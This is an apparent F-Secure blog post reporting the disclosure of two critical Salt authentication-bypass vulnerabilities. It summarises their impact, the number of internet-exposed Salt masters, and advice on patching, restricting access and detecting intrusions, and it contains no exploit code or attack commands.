“Patch by Friday or compromised by Monday,” warns F-Secure Principal Consultant Olle Segerdahl. “That’s how I’d describe the dilemma facing admins who have their Salt master hosts exposed to the internet.”
Olle’s warning is a reference to new Salt vulnerabilities (CVE-2020-11651 and CVE-2020-11652) disclosed earlier today in an F-Secure Labs advisory. Salt is open-source software that organizations use to maintain data centers and cloud environments. It’s also part SaltStack’s infrastructure, network, and security automation solutions. SaltStack issued patches (versions 3000.2 and 2019.2.4) for the vulnerabilities yesterday.
Olle and his team discovered the vulnerabilities during a regular client engagement and flagged them to SaltStack in mid-March. Attackers can exploit the vulnerabilities to bypass the authentication and authorization controls used to regulate access to Salt implementations (which consist of a “master” server and any number of “minion” agents that carry out tasks and collect data for the system). By exploiting these vulnerabilities, an attacker can execute code remotely with root privileges on the master, and consequentially, all the minions that connect to it.
Attackers could simply use the master and its minions (which could amount to hundreds of servers) to mine cryptocurrencies. But skilled attackers can engage in more high impact attacks. For example, they may start by installing backdoors to let them explore the network. Then, they can move to stealing confidential data, extortion (either through ransomware or threatening to leak sensitive information), or a variety of other attacks tailored to their specific target and objectives.
Vulnerabilities don’t get much worse. As F-Secure Chief Research Officer Mikko Hypponen tweeted earlier in the week, they were given a 10 in the Common Vulnerability Scoring System. That’s the highest severity rating possible. It’s only given out for vulnerabilities deemed critical by the National Vulnerability Database.
However, what’s really concerning Olle is the 6000 Salt masters he discovered on the internet while doing his research, which he says are very popular in cloud environments like AWS and GCP.
“I was expecting the number to be a lot lower. There’s not many reasons to expose infrastructure management systems, which is what a lot of companies use Salt for, to the internet,” says Olle. “When new vulnerabilities go public, attackers always race to exploit exposed, vulnerable hosts before admins patch or hide them. So if I were running one of these 6000 masters, I wouldn’t feel comfortable leaving work for the weekend knowing it’s a target.”
The vulnerabilities affect Salt version 3000.1 and earlier, which basically covers all Salt implementations in use before SaltStack’s update. And while attackers will have a more difficult time reaching hosts hidden from the internet, they can still exploit them by accessing corporate networks in other ways first.
Olle recommends organizations use SaltStack’s auto-update capabilities to make sure they receive this and future patches as quickly as possible. He also suggests companies with exposed Salt hosts use additional controls to restrict access to Salt master ports (4505 and 4506 on default configurations), or at least block the hosts off from the open internet. SaltStack has additional guidance on hardening Salt implementations on their website
On a positive note, F-Secure has no evidence or reports of anyone exploiting these vulnerabilities in real attacks.
Furthermore, it’s possible for organizations to detect attacks exploiting these vulnerabilities.
While F-Secure has found no reliable log entries that indicate the attacks Olle researched, concerned organizations can search the master host systems for signs of an intrusion. The Salt master keeps records of scheduled jobs which defenders can search for signs of malicious content or suspicious activity.
More advice on detecting current or previous intrusions using these vulnerabilities, as well as technical details on the vulnerabilities themselves, is available in F-Secure Labs’ advisory.